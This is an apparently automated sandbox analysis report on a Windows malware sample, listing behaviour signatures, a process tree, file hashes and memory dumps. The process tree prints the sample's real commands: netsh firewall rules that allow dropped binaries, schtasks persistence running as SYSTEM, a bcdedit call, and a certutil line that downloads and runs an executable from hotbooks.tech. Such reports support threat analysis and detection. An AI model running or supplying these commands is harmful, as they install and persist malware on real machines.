Analysis
- max time kernel: 90s
- max time network: 209s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 24-05-2022 02:30
Static task: static1
Behavioral task: behavioral1
- Sample: d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
- Resource: win10v2004-20220414-en
General
- Target: d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
- Size: 3.9MB
- MD5: de7029a8adb05fd10cafd0ef1df1fb90
- SHA1: 32d1100326f06828b50b9f58b42a3dbc5adad91b
- SHA256: d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90
- SHA512: 5866ab74a59c60495d9b72ac9e121a7353729f7ed86842c741b457fe8a86280f05a174e32a12999da823a1535a2101a537aec96bf64bfbba078d407a8e1d8ce7
Malware Config
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Processes: svchost.exe
    description | pid | process | target process
    PID 4664 created 2392 | 4664 | svchost.exe | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
- Modifies Windows Firewall (1 TTP)
- Modifies boot configuration data using bcdedit (1 IoC)
  Processes: bcdedit.exe
    pid | process
    1644 | bcdedit.exe
- Program crash (1 IoC)
  Processes: WerFault.exe
    pid | pid_target | process | target process
    4220 | 5000 | WerFault.exe | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
- Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes: schtasks.exe, schtasks.exe
    pid | process
    2368 | schtasks.exe
    2512 | schtasks.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe, d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
    pid | process
    2392 | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
    2392 | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
    5000 | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
    5000 | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe, svchost.exe
    description | pid | process
    Token: SeDebugPrivilege | 2392 | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
    Token: SeImpersonatePrivilege | 2392 | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
    Token: SeTcbPrivilege | 4664 | svchost.exe
    Token: SeTcbPrivilege | 4664 | svchost.exe
- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes: svchost.exe, d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe, cmd.exe
    description | pid | process | target process
    PID 4664 wrote to memory of 5000 | 4664 | svchost.exe | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
    PID 4664 wrote to memory of 5000 | 4664 | svchost.exe | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
    PID 4664 wrote to memory of 5000 | 4664 | svchost.exe | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
    PID 5000 wrote to memory of 428 | 5000 | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe | cmd.exe
    PID 5000 wrote to memory of 428 | 5000 | d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe | cmd.exe
    PID 428 wrote to memory of 3928 | 428 | cmd.exe | netsh.exe
    PID 428 wrote to memory of 3928 | 428 | cmd.exe | netsh.exe
Processes (indented by parent/child relationship)
- C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe"
  signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\d062e72c4a693d8a3a19570a10e0951eeed2040a2d8019b116269c348db78a90.exe"
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe
      command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\netsh.exe
        command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
    - C:\Windows\system32\cmd.exe
      command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
      - C:\Windows\system32\netsh.exe
        command line: netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
    - C:\Windows\rss\csrss.exe
      command line: C:\Windows\rss\csrss.exe ""
      - C:\Windows\SYSTEM32\schtasks.exe
        command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotbooks.tech/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        signatures: Creates scheduled task(s)
      - C:\Windows\SYSTEM32\schtasks.exe
        command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        signatures: Creates scheduled task(s)
      - C:\Windows\system32\bcdedit.exe
        command line: C:\Windows\Sysnative\bcdedit.exe /v
        signatures: Modifies boot configuration data using bcdedit
      - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
    - C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 852
      signatures: Program crash
- C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
  signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5000 -ip 5000
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 923KB
  MD5: f7026d342ec3138975baae46055dd2ee
  SHA1: 56d955b60a69cb44a35f28507211dc01777e2f7a
  SHA256: 185dd733af2e462e2b735eb0ee8111138674f663c752e6fc3a42a7e80008d0e8
  SHA512: 4bddfb0cb532cd3fb198906440d7eee8aa3a2bc1950afe83a3a5fe567595352581ae43b0245fc969da9e2e75d6e67b371c0a24ff29db24447f5426b6a4dd839f
- C:\Windows\rss\csrss.exe
  Filesize: 2.0MB
  MD5: 2b9d10dca8a3cd7a4dcd49830aa2f0c5
  SHA1: 29d231058f7772f9426b9b3c5b8ede9b411fdfdd
  SHA256: 9c8bbbcd60897cc8fe6d1c5cd364fdadd99a546a797792e4c52d7d77f95379bb
  SHA512: fcefd0ca13688e78044a3a0ff01ecb4ad388a4c21e4bbfed2cb6f22544bc8cc851bc0634105b4e8e86b9cbb47bd583835e3c7bc0ee23f69b3e740ce6c0541809
- C:\Windows\rss\csrss.exe
  Filesize: 1.9MB
  MD5: 49f3d134111bbcfd655a0b8751bdd266
  SHA1: d7b39a56602033572399a93308fbfe79273736ef
  SHA256: c484d5519a94ddb9b8c8e2227e63ab96b11c681e2e74f3b093c04f945379a4ee
  SHA512: b28f666d5e9481fb38dbe7331787b03d399ac1de4d25aac5067fe0b7b4839f32d25dd2653420ada082caf8af6b87cac749012442e6e48d480704521d52bf8a71
- memory/320-139-0x0000000000000000-mapping.dmp
- memory/428-134-0x0000000000000000-mapping.dmp
- memory/1644-150-0x0000000000000000-mapping.dmp
- memory/2368-147-0x0000000000000000-mapping.dmp
- memory/2392-130-0x0000000004F93000-0x000000000533A000-memory.dmp
  Filesize: 3.7MB
- memory/2392-132-0x0000000000400000-0x0000000002FC6000-memory.dmp
  Filesize: 43.8MB
- memory/2392-131-0x0000000005340000-0x0000000005A36000-memory.dmp
  Filesize: 7.0MB
- memory/2512-146-0x0000000000000000-mapping.dmp
- memory/2520-140-0x0000000000000000-mapping.dmp
- memory/2908-148-0x0000000000000000-mapping.dmp
- memory/3928-135-0x0000000000000000-mapping.dmp
- memory/3952-145-0x0000000000400000-0x0000000002FC6000-memory.dmp
  Filesize: 43.8MB
- memory/3952-144-0x0000000005100000-0x00000000054A7000-memory.dmp
  Filesize: 3.7MB
- memory/3952-141-0x0000000000000000-mapping.dmp
- memory/5000-138-0x0000000000400000-0x0000000002FC6000-memory.dmp
  Filesize: 43.8MB
- memory/5000-137-0x0000000005070000-0x0000000005766000-memory.dmp
  Filesize: 7.0MB
- memory/5000-136-0x0000000004CC0000-0x0000000005067000-memory.dmp
  Filesize: 3.7MB
- memory/5000-133-0x0000000000000000-mapping.dmp